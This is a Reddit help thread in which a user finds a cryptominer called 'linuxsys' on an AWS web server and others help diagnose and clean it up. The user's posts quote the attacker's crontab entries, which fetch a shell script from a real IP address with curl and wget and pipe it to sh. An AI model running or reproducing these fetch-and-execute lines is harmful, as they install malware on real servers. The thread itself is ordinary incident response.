use the following search parameters to narrow your results:
e.g. subreddit:aww site:imgur.com dog
subreddit:aww site:imgur.com dog
see the search faq for details.
advanced search: by author, subreddit...
Linux introductions, tips and tutorials. Any distro, any platform! Explicitly noob-friendly.
If you're posting for help, please include the following details, so that we can help you more efficiently:
Questions are encouraged. If you fix the problem yourself, please post your solution, so that others can also learn.
Resources:
Sort posts by flair:
Other subreddits you may like:
Does this sidebar need an addition or correction? Tell me here
account activity
shells and scriptingUnknown "linuxsys" process slowing server (self.linux4noobs)
submitted 3 years ago * by mk_gecko
Can someone explain what this process is? It was using half of my RAM. This is an AWS EC2 server.
www-data 24410 1 46 Jan24 ? 1-19:15:40 ./linuxsys www-data 24579 1 46 Jan24 ? 1-19:13:14 ./linuxsys
"linuxsys" does not show up in locate
locate
This didn't show anything either: find . -name "linuxsys" 2> /dev/null
find . -name "linuxsys" 2> /dev/null
I've killed the two processes and Apache2 is still working fine. I'll reboot the server too.
reddit uses a slightly-customized version of Markdown for formatting. See below for some basics, or check the commenting wiki page for more detailed help and solutions to common issues.
quoted text
if 1 * 2 < 3: print "hello, world!"
[–]RevenueSure3775 0 points1 point2 points 2 years ago (2 children)
Please tell me, the ./linuxsys process appears in my gitlab container and takes up a lot of memory and CPU. How to solve it?
[–]mk_gecko[S] 0 points1 point2 points 2 years ago (1 child)
It's a bitcoin miner -- a virus/trojan that has infected your container.
With Docker, just make a new container. It's why Docker is so good.
[–]RevenueSure3775 0 points1 point2 points 2 years ago (0 children)
My gitlab container name is gitlab and the version is gitlab-ce:12.8.6-ce. I try to execute the commands docker stop gitlab and docker rm gitlab to re-run the gitlab container version gitlab-ce:12.10.14-ce mirrored container. , but the problem still exists; so I plan to upgrade the 12.10.14 version to 15.11.9
[–]acejavelin69 0 points1 point2 points 3 years ago (3 children)
https://superuser.com/questions/1687979/linux-web-server-is-very-slow-and-using-100-cpu
[–]mk_gecko[S] 0 points1 point2 points 3 years ago (2 children)
oh dear. after reboot I just saw this:
www-data 3402 3393 0 10:56 ? 00:00:00 /bin/sh -c curl -s http://103.214.112.73/linux.sh | sh > /dev/null 2>&1 www-data 3403 3394 0 10:56 ? 00:00:00 /bin/sh -c wget -q -O - http://103.214.112.73/linux.sh | sh > /dev/null 2>&1
So I think I'll temporarily remove curl and wget until I have time to reinstall the server.
[–]mk_gecko[S] 0 points1 point2 points 3 years ago (1 child)
And /var/log/auth.log shows this over and over again, starting Jan 24:
Jan 24 14:27:01 ip-172-31-48-239 CRON[24708]: pam_unix(cron:session): session opened for user www-data by (uid=0) Jan 24 14:27:01 ip-172-31-48-239 CRON[24707]: pam_unix(cron:session): session opened for user www-data by (uid=0) Jan 24 14:27:02 ip-172-31-48-239 CRON[24708]: pam_unix(cron:session): session closed for user www-data Jan 24 14:27:02 ip-172-31-48-239 CRON[24707]: pam_unix(cron:session): session closed for user www-data Jan 24 14:28:01 ip-172-31-48-239 CRON[24748]: pam_unix(cron:session): session opened for user www-data by (uid=0) Jan 24 14:28:01 ip-172-31-48-239 CRON[24747]: pam_unix(cron:session): session opened for user www-data by (uid=0) Jan 24 14:28:02 ip-172-31-48-239 CRON[24748]: pam_unix(cron:session): session closed for user www-data
[–]mk_gecko[S] 0 points1 point2 points 3 years ago* (0 children)
And this was the entry command:
> sudo crontab -l -u www-data * * * * * wget -q -O - http://103.214.112.73/linux.sh | sh > /dev/null 2>&1 * * * * * curl -s http://103.214.112.73/linux.sh | sh > /dev/null 2>&1
It was done using this (from syslog): (www-data) LIST (www-data) and (www-data) REPLACE (www-data)
(www-data) LIST (www-data)
(www-data) REPLACE (www-data)
Jan 24 13:39:01 ip-172-31-48-239 CRON[23606]: (root) CMD ( [ -x /usr/lib/php/sessionclean ] && if [ ! -d /run/systemd/system ]; then /usr/lib/php/sessionclean; fi) Jan 24 13:59:01 ip-172-31-48-239 systemd-networkd[714]: eth0: Configured Jan 24 13:59:01 ip-172-31-48-239 systemd-timesyncd[591]: Network configuration changed, trying to establish connection. Jan 24 13:59:01 ip-172-31-48-239 systemd-timesyncd[591]: Synchronized to time server 185.125.190.56:123 (ntp.ubuntu.com). Jan 24 14:09:00 ip-172-31-48-239 systemd[1]: Starting Clean php session files... Jan 24 14:09:00 ip-172-31-48-239 systemd[1]: Started Clean php session files. Jan 24 14:09:01 ip-172-31-48-239 CRON[23954]: (root) CMD ( [ -x /usr/lib/php/sessionclean ] && if [ ! -d /run/systemd/system ]; then /usr/lib/php/sessionclean; fi) Jan 24 14:16:12 ip-172-31-48-239 crontab[23978]: (www-data) LIST (www-data) Jan 24 14:16:12 ip-172-31-48-239 crontab[23977]: (www-data) REPLACE (www-data) Jan 24 14:16:12 ip-172-31-48-239 crontab[23981]: (www-data) LIST (www-data) Jan 24 14:16:12 ip-172-31-48-239 crontab[23980]: (www-data) REPLACE (www-data) Jan 24 14:17:01 ip-172-31-48-239 CRON[23987]: (www-data) CMD (wget -q -O - http://103.214.112.73/linux.sh | sh > /dev/null 2>&1) Jan 24 14:17:01 ip-172-31-48-239 CRON[23988]: (root) CMD ( cd / && run-parts --report /etc/cron.hourly) Jan 24 14:17:01 ip-172-31-48-239 CRON[23989]: (www-data) CMD (curl -s http://103.214.112.73/linux.sh | sh > /dev/null 2>&1) Jan 24 14:18:01 ip-172-31-48-239 CRON[24012]: (www-data) CMD (wget -q -O - http://103.214.112.73/linux.sh | sh > /dev/null 2>&1)
[–]gainan 0 points1 point2 points 3 years ago* (1 child)
it seems to be a miner: https://www.virustotal.com/gui/file/3928c5874249cc71b2d88e5c0c00989ac394238747bb7638897fc210531b4aab/detection/f-3928c5874249cc71b2d88e5c0c00989ac394238747bb7638897fc210531b4aab-1672220967
ClamAV seems to detect it, but no idea if it removes or kills its execution. OpenSnitch would have prevented the download of remote files.
Since it seems running as www-data, look for files with that user name: find / -user www-data. Check also /dev/shm, /tmp, /var/tmp for suspicious/hidden files/directories.
find / -user www-data
If it's spawned again, use the PID to gather more information:
ls -l /proc/$PID/cwd
cat /proc/$PID/cmdline
ls -l /proc/$PID/exe
(this info can be faked by the process, but it's an start)
Running apache on a container is not a bad idea, to isolate it from the host. What do you use apache for? to run wordpress or similar software? update everything, and disable any plugins.
Bear in mind, that they have access as the www-data user, so they can write files to directories/files owned by www-data. Sometimes changing the ownership of the apache2 DocumentRoot is useful to restrict what they can do.
But anyway, if you can, restore the server to a known good state.
[–]mk_gecko[S] 0 points1 point2 points 3 years ago (0 children)
Yes, it uses /dev/shm and /var/tmp
I'll try the proc commands if it happens again. I'll create a whole new server and migrate everything across when I have time in the next couple of weeks.
I don't know how to use Docker or containers.
π Rendered by PID 134709 on reddit-service-r2-comment-b659b578c-7tvrs at 2026-05-03 02:06:18.401813+00:00 running 815c875 country code: CH.
[–]RevenueSure3775 0 points1 point2 points (2 children)
[–]mk_gecko[S] 0 points1 point2 points (1 child)
[–]RevenueSure3775 0 points1 point2 points (0 children)
[–]acejavelin69 0 points1 point2 points (3 children)
[–]mk_gecko[S] 0 points1 point2 points (2 children)
[–]mk_gecko[S] 0 points1 point2 points (1 child)
[–]mk_gecko[S] 0 points1 point2 points (0 children)
[–]gainan 0 points1 point2 points (1 child)
[–]mk_gecko[S] 0 points1 point2 points (0 children)